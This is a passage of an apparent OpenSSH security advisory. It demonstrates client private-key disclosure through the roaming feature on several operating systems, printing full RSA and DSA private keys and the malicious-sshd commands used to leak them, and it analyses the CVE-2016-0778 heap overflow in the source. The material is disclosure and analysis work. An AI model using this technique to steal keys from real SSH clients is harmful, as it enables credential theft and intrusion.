/tmp/roaming-9448bb7f/infoleak\nMIIBugIBAAKBgQCEfEo25eMTu/xrpVQxBGEjW/WEfeH4jfqaCDluPBlcl5dFd8KP\ngrGm6fh8c+xdNYRg+ogHwM3uDG5aY62X804UGysCUoY5isSDkkwGrbbemHxR/Cxe\n4bxlIbQrw8KY39xLOY0hC5mpPnB01Cr+otxanYUTpsb8gpEngVvK619O0wIVAJwY\n8RLHmLnPaMFSOvYvGW6eZNgtAoGACkP73ltWMdHM1d0W8Tv403yRPaoCRIiTVQOw\noM8/PQ1JVFmBJxrJXtFJo88TevlDHLEghapj4Wvpx8NJY917bC425T2zDlJ4L9rP\nIeOjqy+HwGtDXjTHspmGy59CNe8E6vowZ3XM4HYH0n4GcwHvmzbhjJxYGmGJrng4\ncRh4VTwCgYAPxVV+3eA46WWZzlnttzxnrr/w/9yUC/DfrKKQ2OGSQ9zyVn7QEEI+\niUB2lkeMqjNwPkxddONOBZB7kFmjOS69Qp0mfmsRf15xneqU8IoMSwqa5LOXM0To\n... \n\n# env ROAMING=\"client_out_buf_size:1024\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -p 222 127.0.0.1\n[connection suspended, press return to resume][connection resumed]\n\n# cat /tmp/roaming-279f5e2b/infoleak\n... \niUB2lkeMqjNwPkxddONOBZB7kFmjOS69Qp0mfmsRf15xneqU8IoMSwqa5LOXM0To\nzEpLjvCtyTJcJgz2oHglVUJqGAx8CQJq2wS+eiSQqJbQpmexNa5GfwIUKbRxQKlh\nPHatTfiy5p82Q8+TD60=\n... \n\n------------------------------------------------------------------------\nPrivate Key Disclosure example: OpenBSD 5.4, 2048-bit RSA key\n------------------------------------------------------------------------\n\n$ head -n 1 /etc/motd\nOpenBSD 5.4 (GENERIC) #37: Tue Jul 30 15:24:05 MDT 2013\n\n$ /usr/bin/ssh -V\nOpenSSH_6.3, OpenSSL 1.0.1c 10 May 2012\n\n$ cat ~/.ssh/id_rsa\n-----BEGIN RSA PRIVATE KEY-----\nMIIEogIBAAKCAQEAzjortydu20T6wC6BhFzKNtVJ9uYSMOjWlghws4OkcXQtu+Cc\nVEhdal/HFyKyiNMAUDMi0gjOHsia8X4GS7xRNwSjUHOXnrvPne/bGF0d4DAxfAFL\n9bOwoNnBIEFci37YMOcGArvrEJ7hbjJhGTudekRU78IMOichpdYtkpkGUyGmf175\nynUpCcJdzngL8yF9Iezc8bfXAyIJjzjXmSVu9DypkeUBW28qIuMr5ksbekHcXhQn\nw8Y2oEDeyPSGIdWZQcVpdfaAk+QjCEs84c0/AvZoG2iY85OptjNDfynFJSDR5muU\nMANXJm5JFfC89fy0nGkQJa1FfNpPjUQY8hWz7QIDAQABAoIBAQC36R6FJrBw8PIh\noxezv8BB6DIe8gx0+6AqinpfTN3Ao9gJPYSMkUBlleaJllLbPDiCTSgXYOzYfRPY\nmwfoUJeo1gUCwSMM1vaPJZEhCCGVhcULjmh8RHQW7jqRllh+um74JX6xv34hA1+M\nk3cONqD4oamRa17WGYGjT/6yRq9iP/0AbBT+haRKYC4nKWrdkqEJXk10pM2kmH6G\n+umbybQrGrPf854VqOdftoku0WjBKrD0hsFZbB24rYmFj+cmbx+cDEqt03xjw+95\nn5xM/97jqB6rzkPAdRUuzNec+QNGMvA+4YpItF1vdEfd0N3Jl/VIQ+8ZAhANnvCt\n8uRHC7OhAoGBAO9PqmApW1CY+BeYDyqGduLwh1HVVZnEURQJprenOtoNxfk7hkNw\nrsKKdc6alWgTArLTEHdULU8GcZ6C0PEcszk2us3AwfPKko8gp2PD5t/8IW0cWxT5\ncMxcelFydu8MuikFthqNEX4tPNrZy4FZlOBGXCYlhvDqHk+U7kVIhkLFAoGBANyb\n3pLYm7gEs9zoL5HxEGvk9x2Ds9PlULcmc//p+4HCegE0tehMaGtygQKRQFuDKOJV\nWGKRjgls7vVXeVI2RABtYsT6OSBU9kNQ01EHzjOqN53O43e6GB4EA+W/GLEsffOZ\npCw09bOVvgClicyekO3kv0lsVvIfAWgxVQY0oZ8JAoGBAIyisquEYmeBHfsvn2oM\nT32agMu0pXOSDVvLODChlFJk2b1YH9UuOWWWXRknezoIQgO5Sen2jBHu5YKTuhqY\nFTNAWJNl/hU5LNv0Aqr8i4eB8lre2SAAXyuaBUAsFnzxa82Dz7rWwDr4dtTePVws\nuvL6Jlk8oIqf62Q1T7ljn5NJAoGAQ8ZHHMobHO+k6ksSwj1TFDKlkJWzm3ep0nqn\nzIlv0S+UF+a/s/w1YD0vUUCaiwLCfrZFjxK0lkS3LPyQsyckwRTZ8TYGct5nQcsF\nALHrMYgryfmTfGbZne8R23VX+qZ2k24yN7qVeXSZiM1ShmB4mf1anw3/sCbCYeY1\n/tAQjzECf1NKzRdfWRhiBqlEquNshrUNWQxYVnXl+WPgilKAIc1XJ9M0dOCvhwjk\nkRTxN77l+klobzq+q+BtPiy9mFmwtwPbAP8l5bVzkZSY2FBDOQiUWS9ZJrCUupeS\nY1tzYFyta0xSod/NGoUd673IgfLnfiGMOLhy+9qhhwCqF10RiS0=\n-----END RSA PRIVATE KEY-----\n\n# env ROAMING=\"client_out_buf_size:2048\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume][connection resumed]\n\n# cat /tmp/roaming-35ee7ab0/infoleak\nMIIEogIBAAKCAQEAzjortydu20T6wC6BhFzKNtVJ9uYSMOjWlghws4OkcXQtu+Cc\nVEhdal/HFyKyiNMAUDMi0gjOHsia8X4GS7xRNwSjUHOXnrvPne/bGF0d4DAxfAFL\n9bOwoNnBIEFci37YMOcGArvrEJ7hbjJhGTudekRU78IMOichpdYtkpkGUyGmf175\nynUpCcJdzngL8yF9Iezc8bfXAyIJjzjXmSVu9DypkeUBW28qIuMr5ksbekHcXhQn\nw8Y2oEDeyPSGIdWZQcVpdfaAk+QjCEs84c0/AvZoG2iY85OptjNDfynFJSDR5muU\nMANXJm5JFfC89fy0nGkQJa1FfNpPjUQY8hWz7QIDAQABAoIBAQC36R6FJrBw8PIh\noxezv8BB6DIe8gx0+6AqinpfTN3Ao9gJPYSMkUBlleaJllLbPDiCTSgXYOzYfRPY\nmwfoUJeo1gUCwSMM1vaPJZEhCCGVhcULjmh8RHQW7jqRllh+um74JX6xv34hA1+M\nk3cONqD4oamRa17WGYGjT/6yRq9iP/0AbBT+haRKYC4nKWrdkqEJXk10pM2kmH6G\n+umbybQrGrPf854VqOdftoku0WjBKrD0hsFZbB24rYmFj+cmbx+cDEqt03xjw+95\nn5xM/97jqB6rzkPAdRUuzNec+QNGMvA+4YpItF1vdEfd0N3Jl/VIQ+8ZAhANnvCt\n8uRHC7OhAoGBAO9PqmApW1CY+BeYDyqGduLwh1HVVZnEURQJprenOtoNxfk7hkNw\nrsKKdc6alWgTArLTEHdULU8GcZ6C0PEcszk2us3AwfPKko8gp2PD5t/8IW0cWxT5\ncMxcelFydu8MuikFthqNEX4tPNrZy4FZlOBGXCYlhvDqHk+U7kVIhkLFAoGBANyb\n3pLYm7gEs9zoL5HxEGvk9x2Ds9PlULcmc//p+4HCegE0tehMaGtygQKRQFuDKOJV\nWGKRjgls7vVXeVI2RABtYsT6OSBU9kNQ01EHzjOqN53O43e6GB4EA+W/GLEsffOZ\npCw09bOVvgClicyekO3kv0lsVvIfAWgxVQY0oZ8JAoGBAIyisquEYmeBHfsvn2oM\nT32agMu0pXOSDVvLODChlFJk2b1YH9UuOWWWXRknezoIQgO5Sen2jBHu5YKTuhqY\nFTNAWJNl/hU5LNv0Aqr8i4eB8lre2SAAXyuaBUAsFnzxa82Dz7rWwDr4dtTePVws\nuvL6Jlk8oIqf62Q1T7ljn5NJAoGAQ8ZHHMobHO+k6ksSwj1TFDKlkJWzm3ep0nqn\nzIlv0S+UF+a/s/w1YD0vUUCaiwLCfrZFjxK0lkS3LPyQsyckwRTZ8TYGct5nQcsF\nALHrMYgryfmTfGbZne8R23VX+qZ2k24yN7qVeXSZiM1ShmB4mf1anw3/sCbCYeY1\n/tAQjzECf1NKzRdfWRhiBqlEquNshrUNWQxYVnXl+WPgilKAIc1XJ9M0dOCvhwjk\nkRTxN77l+klobzq+q+BtPiy9mFmwtwPbAP8l5bVzkZSY2FBDOQiUWS9ZJrCUupeS\n\n$ /usr/bin/ssh -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume][connection resumed]\n\n# cat /tmp/roaming-6cb31d82/infoleak\n... \nuvL6Jlk8oIqf62Q1T7ljn5NJAoGAQ8ZHHMobHO+k6ksSwj1TFDKlkJWzm3ep0nqn\nzIlv0S+UF+a/s/w1YD0vUUCaiwLCfrZFjxK0lkS3LPyQsyckwRTZ8TYGct5nQcsF\nALHrMYgryfmTfGbZne8R23VX+qZ2k24yN7qVeXSZiM1ShmB4mf1anw3/sCbCYeY1\n/tAQjzECf1NKzRdfWRhiBqlEquNshrUNWQxYVnXl+WPgilKAIc1XJ9M0dOCvhwjk\nkRTxN77l+klobzq+q+BtPiy9mFmwtwPbAP8l5bVzkZSY2FBDOQiUWS9ZJrCUupeS\nY1tzYFyta0xSod/NGoUd673IgfLnfiGMOLhy+9qhhwCqF10RiS0=\n\n------------------------------------------------------------------------\nPrivate Key Disclosure example: OpenBSD 5.8, 2048-bit RSA key\n------------------------------------------------------------------------\n\n$ head -n 1 /etc/motd\nOpenBSD 5.8 (GENERIC) #1066: Sun Aug 16 02:33:00 MDT 2015\n\n$ /usr/bin/ssh -V\nOpenSSH_7.0, LibreSSL 2.2.2\n\n$ cat ~/.ssh/id_rsa\n-----BEGIN RSA PRIVATE KEY-----\nMIIEpAIBAAKCAQEAwe9ssfYbABhOGxnBDsPf5Hwypr3tVz4ZCK2Q9ZWWBYnk+KVL\nruLv7NWzeuKF7ls8z4SdpP/09QIIWQO5xWmQ7OM7ndfHWexFoyS/MijorHLvwG1s\n17KFF8aC5vcBTfVkWnFaERueyd+mxv+oIrskA3/DK7/Juojkq70aPAdafiWOuVT8\nL/2exFuzpSmwiXbPuiPgImO9O+9VQ4flZ4qlO18kZxXF948GisxxkceOYWTIX6uh\nxSs/NEGF/drmB4RTAL1ZivG+e4IMxs5naLz4u3Vb8WTDeS6D62WM1eq5JRdlZtGP\nvavL01Kv3sYFvoD0OPUU4BjU8bd4Qb30C3719wIDAQABAoIBAG4zFpipN/590SQl\nJka1luvGhyGoms0QRDliJxTlwzGygaGoi7D800jIxgv13BTtU0i4Grw/lXoDharP\nKyi6K9fv51hx3J2EXK2vm9Vs2YnkZcf6ZfbLQkWYT5nekacy4ati7cL65uffZm19\nqJTTsksqtkSN3ptYXlgYRGgH5av3vaTSTGStL8D0e9fcrjSdN0UntjBB7QGT8ZnY\ngQ1bsSlcPM/TB6JYmHWdpCAVeeCJdDhYoHKlwgQuTdpubdlM80f6qat7bsm95ZTK\nQolQFpmAXeU4Bs5kFlm0K0qYFkWNdI16ScOpK6AQZGUTcHICeRL3GEm6NC0HYBNt\ngKHPucECgYEA7ssL293PZR3W9abbivDxvtCjA+41L8Rl8k+J0Dj0QTQfeHxHD2eL\ncQO2lx4N3E9bJMUnnmjxIT84Dg7SqOWThh3Rof+c/vglyy5o/CzbScISQTvjKfuB\n+s5aNojIqkyKaesQyxmdacLxtBBppZvzCDTHBXvAe4t8Bus2DPBzbzsCgYEAz+jl\nhcsMQ1egiVVpxHdjtm3+D1lbgITk0hzIt9DYEIMBJ7y5Gp2mrcroJAzt7VA2s7Ri\nhBSGv1pjz4j82l00odjCyiUrwvE1Gs48rChzT1PcQvtPCCanDvxOHwpKlUTdUKZh\nvhxPK/DW3IgUL0MlaTOjncR1Zppz4xpF/cSlYHUCgYB0MhVZLXvHxlddPY5C86+O\nnFNWjEkRL040NIPo8G3adJSDumWRl18A5T+qFRPFik/depomuQXsmaibHpdfXCcG\n8eeaHpm0b+dkEPdBDkq+f1MGry+AtEOxWUwIkVKjm48Wry2CxroURqn6Zqohzdra\nuWPGxUsKUvtNGpM4hKCHFQKBgQCM8ylXkRZZOTjeogc4aHAzJ1KL+VptQKsYPudc\nprs0RnwsAmfDQYnUXLEQb6uFrVHIdswrGvdXFuJ/ujEhoPqjlp5ICPcoC/qil5rO\nZAX4i7PRvSoRLpMnN6mGpaV2mN8pZALzraGG+pnPnHmCqRTdw2Jy/NNSofdayV8V\n8ZDkWQKBgQC2pNzgDrXLe+DIUvdKg88483kIR/hP2yJG1V7s+NaDEigIk8BO6qvp\nppa4JYanVDl2TpV258nE0opFQ66Q9sN61SfWfNqyUelZTOTzJIsGNgxDFGvyUTrz\nuiC4d/e3Jlxj21nUciQIe4imMb6nGFbUIsylUrDn8GfA65aePLuaSg==\n-----END RSA PRIVATE KEY-----\n\n# \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -o ProxyCommand=\"/usr/bin/nc -w 1 %h %p\" -p 222 127.0.0.1\n[connection suspended, press return to resume]Segmentation fault (core dumped)\n\n(this example requires a ProxyCommand because of the NULL-aitop bug\ndescribed in the Mitigating Factors of the Information Leak section, and\ncrashes because of the NULL-pointer dereference discussed in the\nMitigating Factors of the Buffer Overflow section)\n\n# cat /tmp/roaming-a5eca355/infoleak\nry+AtEOxWUwIkVKjm48Wry2CxroURqn6Zqohzdra\nuWPGxUsKUvtNGpM4hKCHFQKBgQCM8ylXkRZZOTjeogc4aHAzJ1KL+VptQKsYPudc\nprs0RnwsAmfDQYnUXLEQb6uFrVHIdswrGvdXFuJ/ujEhoPqjlp5ICPcoC/qil5rO\nZAX4i7PRvSoRLpMnN6mGpaV2mN8pZALzraGG+pnPnHmCqRTdw2Jy/NNSofdayV8V\n8ZDkWQKBgQC2pNzgDrXLe+DIUvdKg88483kIR/hP2yJG1V7s+NaDEigIk8BO6qvp\nppa4JYanVDl2TpV258nE0opFQ66Q9sN61SfWfNqyUelZTOTzJIsGNgxDFGvyUTrz\nuiC4d/e3Jlxj21nUciQIe4imMb6nGFbUIsylUrDn8GfA65aePLuaSg==\n\n------------------------------------------------------------------------\nPrivate Key Disclosure example: CentOS 7, 1024-bit DSA key\n------------------------------------------------------------------------\n\n$ grep PRETTY_NAME= /etc/os-release\nPRETTY_NAME=\"CentOS Linux 7 (Core)\"\n\n$ /usr/bin/ssh -V\nOpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013\n\n$ cat ~/.ssh/id_dsa\n-----BEGIN DSA PRIVATE KEY-----\nMIIBvQIBAAKBgQDmjJYHvennuPmKGxfMuNc4nW2Z1via6FkkZILWOO1QJLB5OXqe\nkt7t/AAr+1n0lJbC1Q8hP01LFnxKoqqWfHQIuQL+S88yr5T8KY/VxV9uCVKpQk5n\nGLnZn1lmDldNaqhV0ECESXZVEpq/8TR2m2XjSmE+7Y14hI0cjBdnOz2X8wIVAP0a\nNmtvmc4H+iFvKorV4B+tqRmvAoGBAKjE7ps031YRb6S3htr/ncPlXKtNTSTwaakC\no7l7mJT+lI9vTrQsu3QCLAUZnmVHAIj/m9juk8kXkZvEBXJuPVdL0tCRNAsCioD2\nhUaU7sV6Nho9fJIclxuxZP8j+uzidQKKN/+CVbQougsLsBlstpuQ4Hr2DHmalL8X\niISkLhuyAoGBAKKRxVAVr2Q72Xz6vRmbULRvsfG1sSxNHOssA9CWKByOjDr2mo1l\nB7oIhTZ+eGvtHjiOozM0PzlcRSu5ZY3ZN2hfXITp9/4oatxFUV5V8aniqyq4Kwj/\nQlCmHO7eRlPArhylx8uRnoHkbTRe+by5fmPImz/3WUtgPnx8y3NOEsCtAhUApdtS\nF9AoVoZFKEGn4FEoYIqY3a4=\n-----END DSA PRIVATE KEY-----\n\n# env ROAMING=\"heap_massaging:linux\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -p 222 127.0.0.1\n... \n\n# strings /tmp/roaming-b7b16dfc/infoleak\njJYHvennuPmKGxfMuNc4nW2Z1via6FkkZILWOO1QJLB5OXqe\nkt7t/AAr+1n0lJbC1Q8hP01LFnxKoqqWfHQIuQL+S88yr5T8KY/VxV9uCVKpQk5\n\n# strings /tmp/roaming-b324ce87/infoleak\nIuQL\nR2m2XjSmE+7Y14hI0cjBdnOz2X8wIVAP0a\nNmtvmc4H+iFvKorV4B+tqRmvAoGBAKjE7ps031YRb6S3htr/ncPlXKtNTSTwaakC\no7l7mJT+lI9v\n\n# strings /tmp/roaming-24011739/infoleak\nKjE7ps031YRb6S3htr/ncPlXKtNTSTwaakC\no7l7mJT+lI9vTrQsu3QCLAUZnmVHAIj/m9juk8kXkZvEBXJuPVdL0tCRNAsC\n\n# strings /tmp/roaming-37456846/infoleak\nLsBlstpuQ4Hr2DHmalL8X\niISkLhuyAoGBAKKRxVAVr2Q72Xz6vRmbULRvsfG1sSxNHOssA9CWKByOjDr2mo1l\nB7oIhTZ+eGvtHjiOozM0PzlcRSu5ZY3ZNA\nyq4Kwj/\n\n# strings /tmp/roaming-988ff54c/infoleak\nGBAKKRxVAVr2Q72Xz6vRmbULRvsfG1sSxNHOssA9CWKByOjDr2mo1l\nB7oIhTZ+eGvtHjiOozM0PzlcRSu5ZY3ZN2hfXITp9/4oatxFUV5V8aniqyq4Kwj/\n\n# strings /tmp/roaming-53887fa5/infoleak\n/4oatxFUV5V8aniqyq4Kwj/\nQlCmHO7eRlPArhylx8uRnoHkbTRe+by5fmPImz/3WUtgPnx8y3NOEsCtAhUApdtS\nF9AoVoZFKEGn4FEoYIqY3a4\n\n------------------------------------------------------------------------\nPrivate Key Disclosure example: Fedora 20, 2048-bit RSA key\n------------------------------------------------------------------------\n\n$ grep PRETTY_NAME= /etc/os-release\nPRETTY_NAME=\"Fedora 20 (Heisenbug)\"\n\n$ /usr/bin/ssh -V\nOpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013\n\n$ cat ~/.ssh/id_rsa\n-----BEGIN RSA PRIVATE KEY-----\nMIIEogIBAAKCAQEAmbj/XjOppLWSAhuLKiRoHsdp66LJdY2PvP0ht3GWDKKCk7Gz\nHLas5VjotS9rmupavGGDiicMHPClOttWAI9MRyvP77iZhSei/RzX1/UKk/broTDp\no9ljBnQTzRAyw8ke72Ih77SOGfOLBvYlx80ZmESLYYH95aAeuuDvb236JnsgRPDQ\n/B/gyRIhfqis70USi05/ZbnAenFn+v9zoSduDYMzSM8mFmh9f+9PVb9qMHdfNkIy\n2E78kt9BknU/bEcCWyL+IXNLV0rgRGAcE0ncKu13YvuH/7o4Q7bW2FYErT4P/FHK\ncRmpbVfAzJQb85uXUXaNLVW0A/gHqTaGCUWJUwIDAQABAoIBAD0ZpB8MR9SY+uTt\nj737ZIs/VeF7/blEwCotLvacJjj1axNLYVb7YPN0CGLj61BS8CfKVp9V7+Gc4P/o\n6GEmk/oB9w9gf1zGqWkTytMiqcawMW4LZAJlSI/rGWe7lYHuceZSSgzd5lF4VP06\nXz/wTMkSDZh/M6zOnQhImcLforsiPbTKKIVLL6u13VUmDcYfaBh9VepjyN8i+KIV\nJQB26MlXSxuAp8o0BQUI8FY/dsObJ9xjMT/u2+prtAxpPNfKElEV7ZPBrTRAuCUr\nHiy7yflZ3w0qHekNafX/tnWiU4zi/p6aD4rs10YaYSnSolsDs2k8wHbVP4VtLE8l\nPRfXS6ECgYEAyVf7Pr3TwTa0pPEk1dLz3XHoetTqUND/0Kv+i7MulBzJ4LbcsTEJ\nrtOuGGpLrAYlIvCgT+F26mov5fRGsjjnmP3P/PsvzR8Y9DhiWl9R7qyvNznQYxjo\n/euhzdYixxIkfqyopnYFoER26u37/OHe37PH+8U1JitVrhv7s4NYztECgYEAw3Ot\ngxMqsKh42ydIv1sBg1QEHu0TNvyYy7WCB8jnMsygUQ8EEJs7iKP//CEGRdDAwyGa\njwj3EZsXmtP+wd3fhge7pIHp5RiKfBn0JtSvXQQHO0k0eEcQ4aA/6yESI62wOuaY\nvJ+q7WMo1wHtMoqRPtW/OAxUf91dQRtzK/GpRuMCgYAc7lh6vnoT9FFmtgPN+b7y\n3fBC3h9BN5banCw6VKfnvm8/q+bwSxSSG3aTqYpwEH37lEnk0IfuzQ1O5JfX+hdF\nQ4tEVa+bsNE8HnH7fGDgg821iMgpxSWNfvNECXX71t6JmTOun5zVV6EixsmDn80P\npdyhj8fAUU/BceHr/H6hUQKBgCX5SqPlzGyIPvrtVf//sXqPj0Fm9E3Bo/ooKLxU\ndz7ybM9y6GpFjrqMioa07+AOn/UJiVry9fXQuTRWre+CqRQEWpuqtgPR0c4syLfm\nqK+cwb7uCSi5PfloRiLryPdvnobDGLfFGdOHaX7km+4u5+taYg2Er8IsAxtMNwM5\nr5bbAoGAfxRRGMamXIha8xaJwQnHKC/9v7r79LPFoht/EJ7jw/k8n8yApoLBLBYp\nP/jXU44sbtWB3g3eARxPL3HBLVVMWfW9ob7XxI4lKqCQ9cuKCBqosVbEQhNKZAj+\nZS16+aH97RKdJD/4qiskzzHvZs+wi4LKPHHHz7ETXr/m4CRfMIU=\n-----END RSA PRIVATE KEY-----\n\n# env ROAMING=\"heap_massaging:linux\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -p 222 127.0.0.1\n... \n\n# strings /tmp/roaming-a2bbc5f6/infoleak\ncRmpbVfAzJQb85uXUXaNLVW0A/gHqTaGCUWJUwIDAQABAoIBAD0ZpB8MR9SY+uTt\nj737ZIs/VeF7/blEwCotLvacJjj1axNLYVb7YPN0CG\n\n# strings /tmp/roaming-47b46456/infoleak\nRGAcE0nc\nGCUWJUwIDAQABAoIBAD0ZpB8MR9SY+uTt\nj737ZIs/VeF7/blEwCotLvacJjj1axNLYVb7YPN0CGLj61BS8CfKVp9V7+Gc4P/o\n6GEmk/oB9\n\n# strings /tmp/roaming-7a6717ae/infoleak\ncawMW4LZ1\nXz/wTMkSDZh/M6zOnQhImcLforsiPbTKKIVLL6u13VUmDcYfaBh9VepjyN8i+KIV\nJQB26MlXSxuAp8o0BQUI8FY/dsObJ9xjMT/u2+p\n\n# strings /tmp/roaming-f3091f08/infoleak\nlZ3w0qHe\nnSolsDs2k8wHbVP4VtLE8l\nPRfXS6ECgYEAyVf7Pr3TwTa0pPEk1dLz3XHoetTqUND/0Kv+i7MulBzJ4LbcsTEJ\n\n# strings /tmp/roaming-62a9e9a3/infoleak\nlZ3w0qHe\nr3TwTa0pPEk11\nLbcsTEJ\nrtOuGGpLrAYlIvCgT+F26mov5fRGsjjnmP3P/PsvzR8Y9DhiWl9R7qyvNznQYxjo\n/euhzdYixxIkfqyopnYFoER26u37/OHe37P\n\n# strings /tmp/roaming-8de31ed5/infoleak\n7qyvNznQ\n26u37/OHe37PH+8U1JitVrhv7s4NYztECgYEAw3Ot\ngxMqsKh42ydIv1sBg1QEHu0TNvyYy7WCB8jnMsygUQ8EEJs7iKP//CEGRdDAwyGa\n\n# strings /tmp/roaming-f5e0fbcc/infoleak\nyESI62wOuaY\nvJ+q7WMo1wHtMoqRPtW/OAxUf91dQRtzK/GpRuMCgYAc7lh6vnoT9FFmtgPN+b7y\n3fBC3h9BN5banCw6VKfnvm8/q+bwSxS\n\n# strings /tmp/roaming-9be933df/infoleak\nQRtzK/GpRuMC1\nC3h9BN5banCw6VKfnvm8/q+bwSxSSG3aTqYpwEH37lEnk0IfuzQ1O5JfX+hdF\nQ4tEVa+bsNE8HnH7fGDgg821iMgpxSWNfvNECXX71t6JmT\n\n# strings /tmp/roaming-ee4d1e6c/infoleak\nSG3aTqYp\ntEVa+bsNE8HnH7fGDgg821iMgpxSWNfvNECXX71t6JmTOun5zVV6EixsmDn80P\npdyhj8fAUU/BceHr/H6hUQKBgCX5SqPlzGyIPvrtVf//s\n\n# strings /tmp/roaming-c2bfd69c/infoleak\nSG3aTqYp\n6JmTOun5zVV6A\nH6hUQKBgCX5SqPlzGyIPvrtVf//sXqPj0Fm9E3Bo/ooKLxU\ndz7ybM9y6GpFjrqMioa07+AOn/UJiVry9fXQuTRWre+CqRQEWpuqtgPR0c4s\n\n# strings /tmp/roaming-2b3217a1/infoleak\nDGLfFGdO\nr5bbAoGAfxRRGMamXIha8xaJwQnHKC/9v7r79LPFoht/EJ7jw/k8n8yApoLBLBYp\nP/jXU44sbtWB3g3eARxPL3HBLVVMWfW9ob7XxI4lKqCQ9cuKCQ\n\n# strings /tmp/roaming-1e275747/infoleak\ng3eARxPL3HBLVVMWfW9ob7XxI4lKqCQ9cuKCBqosVbEQhNKZAj+\n\n\n========================================================================\nBuffer Overflow (CVE-2016-0778)\n========================================================================\n\n------------------------------------------------------------------------\nAnalysis\n------------------------------------------------------------------------\n\nSupport for roaming was elegantly added to the OpenSSH client: the calls\nto read() and write() that communicate with the SSH server were replaced\nby calls to roaming_read() and roaming_write(), two wrappers that depend\non wait_for_roaming_reconnect() to transparently reconnect to the server\nafter a disconnection. The wait_for_roaming_reconnect() routine is\nessentially a sequence of four subroutines:\n\n239 int\n240 wait_for_roaming_reconnect(void)\n241 {\n... \n250         fprintf(stderr, \"[connection suspended, press return to resume]\");\n... \n252         packet_backup_state();\n253         /* TODO Perhaps we should read from tty here */\n254         while ((c = fgetc(stdin)) != EOF) {\n... \n259                 if (c != \u0027\\n\u0027 \u0026\u0026 c != \u0027\\r\u0027)\n260                         continue;\n261\n262                 if (ssh_connect(host, \u0026hostaddr, options.port,\n... \n265                     options.proxy_command) == 0 \u0026\u0026 roaming_resume() == 0) {\n266                         packet_restore_state();\n... \n268                         fprintf(stderr, \"[connection resumed]\\n\");\n... \n270                         return 0;\n271                 }\n272\n273                 fprintf(stderr, \"[reconnect failed, press return to retry]\");\n... \n275         }\n276         fprintf(stderr, \"[exiting]\\n\");\n... \n278         exit(0);\n279 }\n\n1. packet_backup_state() close()s connection_in and connection_out (the\nold file descriptors that connected the client to the server), and saves\nthe state of the suspended SSH session (for example, the encryption and\ndecryption contexts). \n\n2. ssh_connect() opens new file descriptors, and connects them to the\nSSH server. \n\n3. roaming_resume() negotiates the resumption of the suspended SSH\nsession with the server, and calls resend_bytes(). \n\n4. packet_restore_state() updates connection_in and connection_out (with\nthe new file descriptors that connect the client to the server), and\nrestores the state of the suspended SSH session. \n\nThe new file descriptors for connection_in and connection_out may differ\nfrom the old ones (if, for example, files or pipes or sockets are opened\nor closed between two successive ssh_connect() calls), but unfortunately\nhistorical code in OpenSSH assumes that they are constant:\n\n- In client_loop(), the variables connection_in and connection_out are\n  cached locally, but packet_write_poll() calls roaming_write(), which\n  may assign new values to connection_in and connection_out (if a\n  reconnection occurs), and client_wait_until_can_do_something()\n  subsequently reuses the old, cached values. \n\n- client_loop() eventually updates these cached values, and the\n  following FD_ISSET() uses a new, updated file descriptor (the fd\n  connection_out), but an old, out-of-date file descriptor set (the\n  fd_set writeset). \n\n- packet_read_seqnr() (old API, or ssh_packet_read_seqnr(), new API)\n  first calloc()ates setp, a file descriptor set for connection_in;\n  next, it loops around memset(), FD_SET(), select() and roaming_read();\n  last, it free()s setp and returns. Unfortunately, roaming_read() may\n  reassign a higher value to connection_in (if a reconnection occurs),\n  but setp is never enlarged, and the following memset() and FD_SET()\n  may therefore overflow setp (a heap-based buffer overflow):\n\n1048 int\n1049 packet_read_seqnr(u_int32_t *seqnr_p)\n1050 {\n.... \n1052         fd_set *setp;\n.... \n1058         setp = (fd_set *)xcalloc(howmany(active_state-\u003econnection_in + 1,\n1059             NFDBITS), sizeof(fd_mask));\n.... \n1065         for (;;) {\n.... \n1075                 if (type != SSH_MSG_NONE) {\n1076                         free(setp);\n1077                         return type;\n1078                 }\n.... \n1083                 memset(setp, 0, howmany(active_state-\u003econnection_in + 1,\n1084                     NFDBITS) * sizeof(fd_mask));\n1085                 FD_SET(active_state-\u003econnection_in, setp);\n.... \n1092                 for (;;) {\n.... \n1097                         if ((ret = select(active_state-\u003econnection_in + 1, setp,\n1098                             NULL, NULL, timeoutp)) \u003e= 0)\n1099                                 break;\n.... \n1115                 }\n.... \n1117                 do {\n.... \n1119                         len = roaming_read(active_state-\u003econnection_in, buf,\n1120                             sizeof(buf), \u0026cont);\n1121                 } while (len == 0 \u0026\u0026 cont);\n.... \n1130         }\n1131         /* NOTREACHED */\n1132 }\n\n- packet_write_wait() (old API, or ssh_packet_write_wait(), new API) is\n  basically similar to packet_read_seqnr() and may overflow its own setp\n  if roaming_write() (called by packet_write_poll()) reassigns a higher\n  value to connection_out (after a successful reconnection):\n\n1739 void\n1740 packet_write_wait(void)\n1741 {\n1742         fd_set *setp;\n.... \n1746         setp = (fd_set *)xcalloc(howmany(active_state-\u003econnection_out + 1,\n1747             NFDBITS), sizeof(fd_mask));\n1748         packet_write_poll();\n1749         while (packet_have_data_to_write()) {\n1750                 memset(setp, 0, howmany(active_state-\u003econnection_out + 1,\n1751                     NFDBITS) * sizeof(fd_mask));\n1752                 FD_SET(active_state-\u003econnection_out, setp);\n.... \n1758                 for (;;) {\n.... \n1763                         if ((ret = select(active_state-\u003econnection_out + 1,\n1764                             NULL, setp, NULL, timeoutp)) \u003e= 0)\n1765                                 break;\n.... \n1776                 }\n.... \n1782                 packet_write_poll();\n1783         }\n1784         